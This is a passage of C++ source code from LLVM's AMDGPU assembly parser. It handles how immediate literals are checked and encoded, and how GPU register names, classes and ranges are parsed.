void cvtVOP3P(MCInst &Inst, const OperandVector &Operands,
OptionalImmIndexMap &OptionalIdx);
void cvtVOP3Interp(MCInst &Inst, const OperandVector &Operands);
void cvtMIMG(MCInst &Inst, const OperandVector &Operands,
bool IsAtomic = false);
void cvtMIMGAtomic(MCInst &Inst, const OperandVector &Operands);
void cvtIntersectRay(MCInst &Inst, const OperandVector &Operands);
void cvtSMEMAtomic(MCInst &Inst, const OperandVector &Operands);
bool parseDimId(unsigned &Encoding);
OperandMatchResultTy parseDim(OperandVector &Operands);
OperandMatchResultTy parseDPP8(OperandVector &Operands);
OperandMatchResultTy parseDPPCtrl(OperandVector &Operands);
bool isSupportedDPPCtrl(StringRef Ctrl, const OperandVector &Operands);
int64_t parseDPPCtrlSel(StringRef Ctrl);
int64_t parseDPPCtrlPerm();
AMDGPUOperand::Ptr defaultRowMask() const;
AMDGPUOperand::Ptr defaultBankMask() const;
AMDGPUOperand::Ptr defaultBoundCtrl() const;
AMDGPUOperand::Ptr defaultFI() const;
void cvtDPP(MCInst &Inst, const OperandVector &Operands, bool IsDPP8 = false);
void cvtDPP8(MCInst &Inst, const OperandVector &Operands) { cvtDPP(Inst, Operands, true); }
OperandMatchResultTy parseSDWASel(OperandVector &Operands, StringRef Prefix,
AMDGPUOperand::ImmTy Type);
OperandMatchResultTy parseSDWADstUnused(OperandVector &Operands);
void cvtSdwaVOP1(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOP2(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOP2b(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOP2e(MCInst &Inst, const OperandVector &Operands);
void cvtSdwaVOPC(MCInst &Inst, const OperandVector &Operands);
void cvtSDWA(MCInst &Inst, const OperandVector &Operands,
uint64_t BasicInstType,
bool SkipDstVcc = false,
bool SkipSrcVcc = false);
AMDGPUOperand::Ptr defaultBLGP() const;
AMDGPUOperand::Ptr defaultCBSZ() const;
AMDGPUOperand::Ptr defaultABID() const;
OperandMatchResultTy parseEndpgmOp(OperandVector &Operands);
AMDGPUOperand::Ptr defaultEndpgmImmOperands() const;
};
struct OptionalOperand {
const char *Name;
AMDGPUOperand::ImmTy Type;
bool IsBit;
bool (*ConvertResult)(int64_t&);
};
} // end anonymous namespace
// May be called with integer type with equivalent bitwidth.
static const fltSemantics *getFltSemantics(unsigned Size) {
switch (Size) {
case 4:
return &APFloat::IEEEsingle();
case 8:
return &APFloat::IEEEdouble();
case 2:
return &APFloat::IEEEhalf();
default:
llvm_unreachable("unsupported fp type");
}
}
static const fltSemantics *getFltSemantics(MVT VT) {
return getFltSemantics(VT.getSizeInBits() / 8);
}
static const fltSemantics *getOpFltSemantics(uint8_t OperandType) {
switch (OperandType) {
case AMDGPU::OPERAND_REG_IMM_INT32:
case AMDGPU::OPERAND_REG_IMM_FP32:
case AMDGPU::OPERAND_REG_IMM_FP32_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT32:
case AMDGPU::OPERAND_REG_INLINE_C_FP32:
case AMDGPU::OPERAND_REG_INLINE_AC_INT32:
case AMDGPU::OPERAND_REG_INLINE_AC_FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP32:
case AMDGPU::OPERAND_REG_IMM_V2FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT32:
case AMDGPU::OPERAND_REG_IMM_V2INT32:
case AMDGPU::OPERAND_KIMM32:
return &APFloat::IEEEsingle();
case AMDGPU::OPERAND_REG_IMM_INT64:
case AMDGPU::OPERAND_REG_IMM_FP64:
case AMDGPU::OPERAND_REG_INLINE_C_INT64:
case AMDGPU::OPERAND_REG_INLINE_C_FP64:
case AMDGPU::OPERAND_REG_INLINE_AC_FP64:
return &APFloat::IEEEdouble();
case AMDGPU::OPERAND_REG_IMM_INT16:
case AMDGPU::OPERAND_REG_IMM_FP16:
case AMDGPU::OPERAND_REG_IMM_FP16_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT16:
case AMDGPU::OPERAND_REG_INLINE_C_FP16:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2FP16:
case AMDGPU::OPERAND_REG_IMM_V2INT16:
case AMDGPU::OPERAND_REG_IMM_V2FP16:
case AMDGPU::OPERAND_KIMM16:
return &APFloat::IEEEhalf();
default:
llvm_unreachable("unsupported fp type");
}
}
//===----------------------------------------------------------------------===//
// Operand
//===----------------------------------------------------------------------===//
static bool canLosslesslyConvertToFPType(APFloat &FPLiteral, MVT VT) {
bool Lost;
// Convert literal to single precision
APFloat::opStatus Status = FPLiteral.convert(*getFltSemantics(VT),
APFloat::rmNearestTiesToEven,
&Lost);
// We allow precision lost but not overflow or underflow
if (Status != APFloat::opOK &&
Lost &&
((Status & APFloat::opOverflow) != 0 ||
(Status & APFloat::opUnderflow) != 0)) {
return false;
}
return true;
}
static bool isSafeTruncation(int64_t Val, unsigned Size) {
return isUIntN(Size, Val) || isIntN(Size, Val);
}
static bool isInlineableLiteralOp16(int64_t Val, MVT VT, bool HasInv2Pi) {
if (VT.getScalarType() == MVT::i16) {
// FP immediate values are broken.
return isInlinableIntLiteral(Val);
}
// f16/v2f16 operands work correctly for all values.
return AMDGPU::isInlinableLiteral16(Val, HasInv2Pi);
}
bool AMDGPUOperand::isInlinableImm(MVT type) const {
// This is a hack to enable named inline values like
// shared_base with both 32-bit and 64-bit operands.
// Note that these values are defined as
// 32-bit operands only.
if (isInlineValue()) {
return true;
}
if (!isImmTy(ImmTyNone)) {
// Only plain immediates are inlinable (e.g. "clamp" attribute is not)
return false;
}
// TODO: We should avoid using host float here. It would be better to
// check the float bit values which is what a few other places do.
// We've had bot failures before due to weird NaN support on mips hosts.
APInt Literal(64, Imm.Val);
if (Imm.IsFPImm) { // We got fp literal token
if (type == MVT::f64 || type == MVT::i64) { // Expected 64-bit operand
return AMDGPU::isInlinableLiteral64(Imm.Val,
AsmParser->hasInv2PiInlineImm());
}
APFloat FPLiteral(APFloat::IEEEdouble(), APInt(64, Imm.Val));
if (!canLosslesslyConvertToFPType(FPLiteral, type))
return false;
if (type.getScalarSizeInBits() == 16) {
return isInlineableLiteralOp16(
static_cast<int16_t>(FPLiteral.bitcastToAPInt().getZExtValue()),
type, AsmParser->hasInv2PiInlineImm());
}
// Check if single precision literal is inlinable
return AMDGPU::isInlinableLiteral32(
static_cast<int32_t>(FPLiteral.bitcastToAPInt().getZExtValue()),
AsmParser->hasInv2PiInlineImm());
}
// We got int literal token.
if (type == MVT::f64 || type == MVT::i64) { // Expected 64-bit operand
return AMDGPU::isInlinableLiteral64(Imm.Val,
AsmParser->hasInv2PiInlineImm());
}
if (!isSafeTruncation(Imm.Val, type.getScalarSizeInBits())) {
return false;
}
if (type.getScalarSizeInBits() == 16) {
return isInlineableLiteralOp16(
static_cast<int16_t>(Literal.getLoBits(16).getSExtValue()),
type, AsmParser->hasInv2PiInlineImm());
}
return AMDGPU::isInlinableLiteral32(
static_cast<int32_t>(Literal.getLoBits(32).getZExtValue()),
AsmParser->hasInv2PiInlineImm());
}
bool AMDGPUOperand::isLiteralImm(MVT type) const {
// Check that this immediate can be added as literal
if (!isImmTy(ImmTyNone)) {
return false;
}
if (!Imm.IsFPImm) {
// We got int literal token.
if (type == MVT::f64 && hasFPModifiers()) {
// Cannot apply fp modifiers to int literals preserving the same semantics
// for VOP1/2/C and VOP3 because of integer truncation. To avoid ambiguity,
// disable these cases.
return false;
}
unsigned Size = type.getSizeInBits();
if (Size == 64)
Size = 32;
// FIXME: 64-bit operands can zero extend, sign extend, or pad zeroes for FP
// types.
return isSafeTruncation(Imm.Val, Size);
}
// We got fp literal token
if (type == MVT::f64) { // Expected 64-bit fp operand
// We would set low 64-bits of literal to zeroes but we accept this literals
return true;
}
if (type == MVT::i64) { // Expected 64-bit int operand
// We don't allow fp literals in 64-bit integer instructions. It is
// unclear how we should encode them.
return false;
}
// We allow fp literals with f16x2 operands assuming that the specified
// literal goes into the lower half and the upper half is zero. We also
// require that the literal may be losslessly converted to f16.
MVT ExpectedType = (type == MVT::v2f16)? MVT::f16 :
(type == MVT::v2i16)? MVT::i16 :
(type == MVT::v2f32)? MVT::f32 : type;
APFloat FPLiteral(APFloat::IEEEdouble(), APInt(64, Imm.Val));
return canLosslesslyConvertToFPType(FPLiteral, ExpectedType);
}
bool AMDGPUOperand::isRegClass(unsigned RCID) const {
return isRegKind() && AsmParser->getMRI()->getRegClass(RCID).contains(getReg());
}
bool AMDGPUOperand::isVRegWithInputMods() const {
return isRegClass(AMDGPU::VGPR_32RegClassID) ||
// GFX90A allows DPP on 64-bit operands.
(isRegClass(AMDGPU::VReg_64RegClassID) &&
AsmParser->getFeatureBits()[AMDGPU::Feature64BitDPP]);
}
bool AMDGPUOperand::isSDWAOperand(MVT type) const {
if (AsmParser->isVI())
return isVReg32();
else if (AsmParser->isGFX9Plus())
return isRegClass(AMDGPU::VS_32RegClassID) || isInlinableImm(type);
else
return false;
}
bool AMDGPUOperand::isSDWAFP16Operand() const {
return isSDWAOperand(MVT::f16);
}
bool AMDGPUOperand::isSDWAFP32Operand() const {
return isSDWAOperand(MVT::f32);
}
bool AMDGPUOperand::isSDWAInt16Operand() const {
return isSDWAOperand(MVT::i16);
}
bool AMDGPUOperand::isSDWAInt32Operand() const {
return isSDWAOperand(MVT::i32);
}
bool AMDGPUOperand::isBoolReg() const {
auto FB = AsmParser->getFeatureBits();
return isReg() && ((FB[AMDGPU::FeatureWavefrontSize64] && isSCSrcB64()) ||
(FB[AMDGPU::FeatureWavefrontSize32] && isSCSrcB32()));
}
uint64_t AMDGPUOperand::applyInputFPModifiers(uint64_t Val, unsigned Size) const
{
assert(isImmTy(ImmTyNone) && Imm.Mods.hasFPModifiers());
assert(Size == 2 || Size == 4 || Size == 8);
const uint64_t FpSignMask = (1ULL << (Size * 8 - 1));
if (Imm.Mods.Abs) {
Val &= ~FpSignMask;
}
if (Imm.Mods.Neg) {
Val ^= FpSignMask;
}
return Val;
}
void AMDGPUOperand::addImmOperands(MCInst &Inst, unsigned N, bool ApplyModifiers) const {
if (AMDGPU::isSISrcOperand(AsmParser->getMII()->get(Inst.getOpcode()),
Inst.getNumOperands())) {
addLiteralImmOperand(Inst, Imm.Val,
ApplyModifiers &
isImmTy(ImmTyNone) && Imm.Mods.hasFPModifiers());
} else {
assert(!isImmTy(ImmTyNone) || !hasModifiers());
Inst.addOperand(MCOperand::createImm(Imm.Val));
setImmKindNone();
}
}
void AMDGPUOperand::addLiteralImmOperand(MCInst &Inst, int64_t Val, bool ApplyModifiers) const {
const auto& InstDesc = AsmParser->getMII()->get(Inst.getOpcode());
auto OpNum = Inst.getNumOperands();
// Check that this operand accepts literals
assert(AMDGPU::isSISrcOperand(InstDesc, OpNum));
if (ApplyModifiers) {
assert(AMDGPU::isSISrcFPOperand(InstDesc, OpNum));
const unsigned Size = Imm.IsFPImm ? sizeof(double) : getOperandSize(InstDesc, OpNum);
Val = applyInputFPModifiers(Val, Size);
}
APInt Literal(64, Val);
uint8_t OpTy = InstDesc.OpInfo[OpNum].OperandType;
if (Imm.IsFPImm) { // We got fp literal token
switch (OpTy) {
case AMDGPU::OPERAND_REG_IMM_INT64:
case AMDGPU::OPERAND_REG_IMM_FP64:
case AMDGPU::OPERAND_REG_INLINE_C_INT64:
case AMDGPU::OPERAND_REG_INLINE_C_FP64:
case AMDGPU::OPERAND_REG_INLINE_AC_FP64:
if (AMDGPU::isInlinableLiteral64(Literal.getZExtValue(),
AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Literal.getZExtValue()));
setImmKindConst();
return;
}
// Non-inlineable
if (AMDGPU::isSISrcFPOperand(InstDesc, OpNum)) { // Expected 64-bit fp operand
// For fp operands we check if low 32 bits are zeros
if (Literal.getLoBits(32) != 0) {
const_cast<AMDGPUAsmParser *>(AsmParser)->Warning(Inst.getLoc(),
"Can't encode literal as exact 64-bit floating-point operand. "
"Low 32-bits will be set to zero");
}
Inst.addOperand(MCOperand::createImm(Literal.lshr(32).getZExtValue()));
setImmKindLiteral();
return;
}
// We don't allow fp literals in 64-bit integer instructions. It is
// unclear how we should encode them. This case should be checked earlier
// in predicate methods (isLiteralImm())
llvm_unreachable("fp literal in 64-bit integer instruction.");
case AMDGPU::OPERAND_REG_IMM_INT32:
case AMDGPU::OPERAND_REG_IMM_FP32:
case AMDGPU::OPERAND_REG_IMM_FP32_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT32:
case AMDGPU::OPERAND_REG_INLINE_C_FP32:
case AMDGPU::OPERAND_REG_INLINE_AC_INT32:
case AMDGPU::OPERAND_REG_INLINE_AC_FP32:
case AMDGPU::OPERAND_REG_IMM_INT16:
case AMDGPU::OPERAND_REG_IMM_FP16:
case AMDGPU::OPERAND_REG_IMM_FP16_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT16:
case AMDGPU::OPERAND_REG_INLINE_C_FP16:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2FP16:
case AMDGPU::OPERAND_REG_IMM_V2INT16:
case AMDGPU::OPERAND_REG_IMM_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP32:
case AMDGPU::OPERAND_REG_IMM_V2FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT32:
case AMDGPU::OPERAND_REG_IMM_V2INT32:
case AMDGPU::OPERAND_KIMM32:
case AMDGPU::OPERAND_KIMM16: {
bool lost;
APFloat FPLiteral(APFloat::IEEEdouble(), Literal);
// Convert literal to single precision
FPLiteral.convert(*getOpFltSemantics(OpTy),
APFloat::rmNearestTiesToEven, &lost);
// We allow precision lost but not overflow or underflow. This should be
// checked earlier in isLiteralImm()
uint64_t ImmVal = FPLiteral.bitcastToAPInt().getZExtValue();
Inst.addOperand(MCOperand::createImm(ImmVal));
setImmKindLiteral();
return;
}
default:
llvm_unreachable("invalid operand size");
}
return;
}
// We got int literal token.
// Only sign extend inline immediates.
switch (OpTy) {
case AMDGPU::OPERAND_REG_IMM_INT32:
case AMDGPU::OPERAND_REG_IMM_FP32:
case AMDGPU::OPERAND_REG_IMM_FP32_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT32:
case AMDGPU::OPERAND_REG_INLINE_C_FP32:
case AMDGPU::OPERAND_REG_INLINE_AC_INT32:
case AMDGPU::OPERAND_REG_INLINE_AC_FP32:
case AMDGPU::OPERAND_REG_IMM_V2INT16:
case AMDGPU::OPERAND_REG_IMM_V2FP16:
case AMDGPU::OPERAND_REG_IMM_V2FP32:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP32:
case AMDGPU::OPERAND_REG_IMM_V2INT32:
case AMDGPU::OPERAND_REG_INLINE_C_V2INT32:
if (isSafeTruncation(Val, 32) &&
AMDGPU::isInlinableLiteral32(static_cast<int32_t>(Val),
AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Val));
setImmKindConst();
return;
}
Inst.addOperand(MCOperand::createImm(Val & 0xffffffff));
setImmKindLiteral();
return;
case AMDGPU::OPERAND_REG_IMM_INT64:
case AMDGPU::OPERAND_REG_IMM_FP64:
case AMDGPU::OPERAND_REG_INLINE_C_INT64:
case AMDGPU::OPERAND_REG_INLINE_C_FP64:
case AMDGPU::OPERAND_REG_INLINE_AC_FP64:
if (AMDGPU::isInlinableLiteral64(Val, AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Val));
setImmKindConst();
return;
}
Inst.addOperand(MCOperand::createImm(Lo_32(Val)));
setImmKindLiteral();
return;
case AMDGPU::OPERAND_REG_IMM_INT16:
case AMDGPU::OPERAND_REG_IMM_FP16:
case AMDGPU::OPERAND_REG_IMM_FP16_DEFERRED:
case AMDGPU::OPERAND_REG_INLINE_C_INT16:
case AMDGPU::OPERAND_REG_INLINE_C_FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_FP16:
if (isSafeTruncation(Val, 16) &&
AMDGPU::isInlinableLiteral16(static_cast<int16_t>(Val),
AsmParser->hasInv2PiInlineImm())) {
Inst.addOperand(MCOperand::createImm(Val));
setImmKindConst();
return;
}
Inst.addOperand(MCOperand::createImm(Val & 0xffff));
setImmKindLiteral();
return;
case AMDGPU::OPERAND_REG_INLINE_C_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_C_V2FP16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2INT16:
case AMDGPU::OPERAND_REG_INLINE_AC_V2FP16: {
assert(isSafeTruncation(Val, 16));
assert(AMDGPU::isInlinableLiteral16(static_cast<int16_t>(Val),
AsmParser->hasInv2PiInlineImm()));
Inst.addOperand(MCOperand::createImm(Val));
return;
}
case AMDGPU::OPERAND_KIMM32:
Inst.addOperand(MCOperand::createImm(Literal.getLoBits(32).getZExtValue()));
setImmKindNone();
return;
case AMDGPU::OPERAND_KIMM16:
Inst.addOperand(MCOperand::createImm(Literal.getLoBits(16).getZExtValue()));
setImmKindNone();
return;
default:
llvm_unreachable("invalid operand size");
}
}
template <unsigned Bitwidth>
void AMDGPUOperand::addKImmFPOperands(MCInst &Inst, unsigned N) const {
APInt Literal(64, Imm.Val);
setImmKindNone();
if (!Imm.IsFPImm) {
// We got int literal token.
Inst.addOperand(MCOperand::createImm(Literal.getLoBits(Bitwidth).getZExtValue()));
return;
}
bool Lost;
APFloat FPLiteral(APFloat::IEEEdouble(), Literal);
FPLiteral.convert(*getFltSemantics(Bitwidth / 8),
APFloat::rmNearestTiesToEven, &Lost);
Inst.addOperand(MCOperand::createImm(FPLiteral.bitcastToAPInt().getZExtValue()));
}
void AMDGPUOperand::addRegOperands(MCInst &Inst, unsigned N) const {
Inst.addOperand(MCOperand::createReg(AMDGPU::getMCReg(getReg(), AsmParser->getSTI())));
}
static bool isInlineValue(unsigned Reg) {
switch (Reg) {
case AMDGPU::SRC_SHARED_BASE:
case AMDGPU::SRC_SHARED_LIMIT:
case AMDGPU::SRC_PRIVATE_BASE:
case AMDGPU::SRC_PRIVATE_LIMIT:
case AMDGPU::SRC_POPS_EXITING_WAVE_ID:
return true;
case AMDGPU::SRC_VCCZ:
case AMDGPU::SRC_EXECZ:
case AMDGPU::SRC_SCC:
return true;
case AMDGPU::SGPR_NULL:
return true;
default:
return false;
}
}
bool AMDGPUOperand::isInlineValue() const {
return isRegKind() && ::isInlineValue(getReg());
}
//===----------------------------------------------------------------------===//
// AsmParser
//===----------------------------------------------------------------------===//
static int getRegClass(RegisterKind Is, unsigned RegWidth) {
if (Is == IS_VGPR) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::VGPR_32RegClassID;
case 2: return AMDGPU::VReg_64RegClassID;
case 3: return AMDGPU::VReg_96RegClassID;
case 4: return AMDGPU::VReg_128RegClassID;
case 5: return AMDGPU::VReg_160RegClassID;
case 6: return AMDGPU::VReg_192RegClassID;
case 7: return AMDGPU::VReg_224RegClassID;
case 8: return AMDGPU::VReg_256RegClassID;
case 16: return AMDGPU::VReg_512RegClassID;
case 32: return AMDGPU::VReg_1024RegClassID;
}
} else if (Is == IS_TTMP) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::TTMP_32RegClassID;
case 2: return AMDGPU::TTMP_64RegClassID;
case 4: return AMDGPU::TTMP_128RegClassID;
case 8: return AMDGPU::TTMP_256RegClassID;
case 16: return AMDGPU::TTMP_512RegClassID;
}
} else if (Is == IS_SGPR) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::SGPR_32RegClassID;
case 2: return AMDGPU::SGPR_64RegClassID;
case 3: return AMDGPU::SGPR_96RegClassID;
case 4: return AMDGPU::SGPR_128RegClassID;
case 5: return AMDGPU::SGPR_160RegClassID;
case 6: return AMDGPU::SGPR_192RegClassID;
case 7: return AMDGPU::SGPR_224RegClassID;
case 8: return AMDGPU::SGPR_256RegClassID;
case 16: return AMDGPU::SGPR_512RegClassID;
}
} else if (Is == IS_AGPR) {
switch (RegWidth) {
default: return -1;
case 1: return AMDGPU::AGPR_32RegClassID;
case 2: return AMDGPU::AReg_64RegClassID;
case 3: return AMDGPU::AReg_96RegClassID;
case 4: return AMDGPU::AReg_128RegClassID;
case 5: return AMDGPU::AReg_160RegClassID;
case 6: return AMDGPU::AReg_192RegClassID;
case 7: return AMDGPU::AReg_224RegClassID;
case 8: return AMDGPU::AReg_256RegClassID;
case 16: return AMDGPU::AReg_512RegClassID;
case 32: return AMDGPU::AReg_1024RegClassID;
}
}
return -1;
}
static unsigned getSpecialRegForName(StringRef RegName) {
return StringSwitch<unsigned>(RegName)
.Case("exec", AMDGPU::EXEC)
.Case("vcc", AMDGPU::VCC)
.Case("flat_scratch", AMDGPU::FLAT_SCR)
.Case("xnack_mask", AMDGPU::XNACK_MASK)
.Case("shared_base", AMDGPU::SRC_SHARED_BASE)
.Case("src_shared_base", AMDGPU::SRC_SHARED_BASE)
.Case("shared_limit", AMDGPU::SRC_SHARED_LIMIT)
.Case("src_shared_limit", AMDGPU::SRC_SHARED_LIMIT)
.Case("private_base", AMDGPU::SRC_PRIVATE_BASE)
.Case("src_private_base", AMDGPU::SRC_PRIVATE_BASE)
.Case("private_limit", AMDGPU::SRC_PRIVATE_LIMIT)
.Case("src_private_limit", AMDGPU::SRC_PRIVATE_LIMIT)
.Case("pops_exiting_wave_id", AMDGPU::SRC_POPS_EXITING_WAVE_ID)
.Case("src_pops_exiting_wave_id", AMDGPU::SRC_POPS_EXITING_WAVE_ID)
.Case("lds_direct", AMDGPU::LDS_DIRECT)
.Case("src_lds_direct", AMDGPU::LDS_DIRECT)
.Case("m0", AMDGPU::M0)
.Case("vccz", AMDGPU::SRC_VCCZ)
.Case("src_vccz", AMDGPU::SRC_VCCZ)
.Case("execz", AMDGPU::SRC_EXECZ)
.Case("src_execz", AMDGPU::SRC_EXECZ)
.Case("scc", AMDGPU::SRC_SCC)
.Case("src_scc", AMDGPU::SRC_SCC)
.Case("tba", AMDGPU::TBA)
.Case("tma", AMDGPU::TMA)
.Case("flat_scratch_lo", AMDGPU::FLAT_SCR_LO)
.Case("flat_scratch_hi", AMDGPU::FLAT_SCR_HI)
.Case("xnack_mask_lo", AMDGPU::XNACK_MASK_LO)
.Case("xnack_mask_hi", AMDGPU::XNACK_MASK_HI)
.Case("vcc_lo", AMDGPU::VCC_LO)
.Case("vcc_hi", AMDGPU::VCC_HI)
.Case("exec_lo", AMDGPU::EXEC_LO)
.Case("exec_hi", AMDGPU::EXEC_HI)
.Case("tma_lo", AMDGPU::TMA_LO)
.Case("tma_hi", AMDGPU::TMA_HI)
.Case("tba_lo", AMDGPU::TBA_LO)
.Case("tba_hi", AMDGPU::TBA_HI)
.Case("pc", AMDGPU::PC_REG)
.Case("null", AMDGPU::SGPR_NULL)
.Default(AMDGPU::NoRegister);
}
bool AMDGPUAsmParser::ParseRegister(unsigned &RegNo, SMLoc &StartLoc,
SMLoc &EndLoc, bool RestoreOnFailure) {
auto R = parseRegister();
if (!R) return true;
assert(R->isReg());
RegNo = R->getReg();
StartLoc = R->getStartLoc();
EndLoc = R->getEndLoc();
return false;
}
bool AMDGPUAsmParser::ParseRegister(unsigned &RegNo, SMLoc &StartLoc,
SMLoc &EndLoc) {
return ParseRegister(RegNo, StartLoc, EndLoc, /*RestoreOnFailure=*/false);
}
OperandMatchResultTy AMDGPUAsmParser::tryParseRegister(unsigned &RegNo,
SMLoc &StartLoc,
SMLoc &EndLoc) {
bool Result =
ParseRegister(RegNo, StartLoc, EndLoc, /*RestoreOnFailure=*/true);
bool PendingErrors = getParser().hasPendingError();
getParser().clearPendingErrors();
if (PendingErrors)
return MatchOperand_ParseFail;
if (Result)
return MatchOperand_NoMatch;
return MatchOperand_Success;
}
bool AMDGPUAsmParser::AddNextRegisterToList(unsigned &Reg, unsigned &RegWidth,
RegisterKind RegKind, unsigned Reg1,
SMLoc Loc) {
switch (RegKind) {
case IS_SPECIAL:
if (Reg == AMDGPU::EXEC_LO && Reg1 == AMDGPU::EXEC_HI) {
Reg = AMDGPU::EXEC;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::FLAT_SCR_LO && Reg1 == AMDGPU::FLAT_SCR_HI) {
Reg = AMDGPU::FLAT_SCR;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::XNACK_MASK_LO && Reg1 == AMDGPU::XNACK_MASK_HI) {
Reg = AMDGPU::XNACK_MASK;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::VCC_LO && Reg1 == AMDGPU::VCC_HI) {
Reg = AMDGPU::VCC;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::TBA_LO && Reg1 == AMDGPU::TBA_HI) {
Reg = AMDGPU::TBA;
RegWidth = 2;
return true;
}
if (Reg == AMDGPU::TMA_LO && Reg1 == AMDGPU::TMA_HI) {
Reg = AMDGPU::TMA;
RegWidth = 2;
return true;
}
Error(Loc, "register does not fit in the list");
return false;
case IS_VGPR:
case IS_SGPR:
case IS_AGPR:
case IS_TTMP:
if (Reg1 != Reg + RegWidth) {
Error(Loc, "registers in a list must have consecutive indices");
return false;
}
RegWidth++;
return true;
default:
llvm_unreachable("unexpected register kind");
}
}
struct RegInfo {
StringLiteral Name;
RegisterKind Kind;
};
static constexpr RegInfo RegularRegisters[] = {
{{"v"}, IS_VGPR},
{{"s"}, IS_SGPR},
{{"ttmp"}, IS_TTMP},
{{"acc"}, IS_AGPR},
{{"a"}, IS_AGPR},
};
static bool isRegularReg(RegisterKind Kind) {
return Kind == IS_VGPR ||
Kind == IS_SGPR ||
Kind == IS_TTMP ||
Kind == IS_AGPR;
}
static const RegInfo* getRegularRegInfo(StringRef Str) {
for (const RegInfo &Reg : RegularRegisters)
if (Str.startswith(Reg.Name))
return &Reg;
return nullptr;
}
static bool getRegNum(StringRef Str, unsigned& Num) {
return !Str.getAsInteger(10, Num);
}
bool
AMDGPUAsmParser::isRegister(const AsmToken &Token,
const AsmToken &NextToken) const {
// A list of consecutive registers: [s0,s1,s2,s3]
if (Token.is(AsmToken::LBrac))
return true;
if (!Token.is(AsmToken::Identifier))
return false;
// A single register like s0 or a range of registers like s[0:1]
StringRef Str = Token.getString();
const RegInfo *Reg = getRegularRegInfo(Str);
if (Reg) {
StringRef RegName = Reg->Name;
StringRef RegSuffix = Str.substr(RegName.size());
if (!RegSuffix.empty()) {
unsigned Num;
// A single register with an index: rXX
if (getRegNum(RegSuffix, Num))
return true;
} else {
// A range of registers: r[XX:YY].
if (NextToken.is(AsmToken::LBrac))
return true;
}
}
return getSpecialRegForName(Str) != AMDGPU::NoRegister;
}
bool
AMDGPUAsmParser::isRegister()
{
return isRegister(getToken(), peekToken());
}
unsigned
AMDGPUAsmParser::getRegularReg(RegisterKind RegKind,
unsigned RegNum,
unsigned RegWidth,
SMLoc Loc) {
assert(isRegularReg(RegKind));
unsigned AlignSize = 1;
if (RegKind == IS_SGPR || RegKind == IS_TTMP) {
// SGPR and TTMP registers must be aligned.
// Max required alignment is 4 dwords.
AlignSize = std::min(RegWidth, 4u);
}
if (RegNum % AlignSize != 0) {
Error(Loc, "invalid register alignment");
return AMDGPU::NoRegister;
}
unsigned RegIdx = RegNum / AlignSize;
int RCID = getRegClass(RegKind, RegWidth);
if (RCID == -1) {
Error(Loc, "invalid or unsupported register size");
return AMDGPU::NoRegister;
}
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
const MCRegisterClass RC = TRI->getRegClass(RCID);
if (RegIdx >= RC.getNumRegs()) {
Error(Loc, "register index is out of range");
return AMDGPU::NoRegister;
}
return RC.getRegister(RegIdx);
}
bool
AMDGPUAsmParser::ParseRegRange(unsigned& Num, unsigned& Width) {
int64_t RegLo, RegHi;
if (!skipToken(AsmToken::LBrac, "missing register index"))
return false;
SMLoc FirstIdxLoc = getLoc();
SMLoc SecondIdxLoc;
if (!parseExpr(RegLo))
return false;
if (trySkipToken(AsmToken::Colon)) {
SecondIdxLoc = getLoc();
if (!parseExpr(RegHi))
return false;
} else {
RegHi = RegLo;
}
if (!skipToken(AsmToken::RBrac, "expected a closing square bracket"))
return false;
if (!isUInt<32>(RegLo)) {
Error(FirstIdxLoc, "invalid register index");
return false;
}
if (!isUInt<32>(RegHi)) {
Error(SecondIdxLoc, "invalid register index");
return false;
}
if (RegLo > RegHi) {
Error(FirstIdxLoc, "first register index should not exceed second index");
return false;
}
Num = static_cast<unsigned>(RegLo);
Width = (RegHi - RegLo) + 1;
return true;
}
unsigned AMDGPUAsmParser::ParseSpecialReg(RegisterKind &RegKind,
unsigned &RegNum, unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens) {
assert(isToken(AsmToken::Identifier));
unsigned Reg = getSpecialRegForName(getTokenStr());
if (Reg) {
RegNum = 0;
RegWidth = 1;
RegKind = IS_SPECIAL;
Tokens.push_back(getToken());
lex(); // skip register name
}
return Reg;
}
unsigned AMDGPUAsmParser::ParseRegularReg(RegisterKind &RegKind,
unsigned &RegNum, unsigned &RegWidth,
SmallVectorImpl<AsmToken> &Tokens) {
assert(isToken(AsmToken::Identifier));
StringRef RegName = getTokenStr();
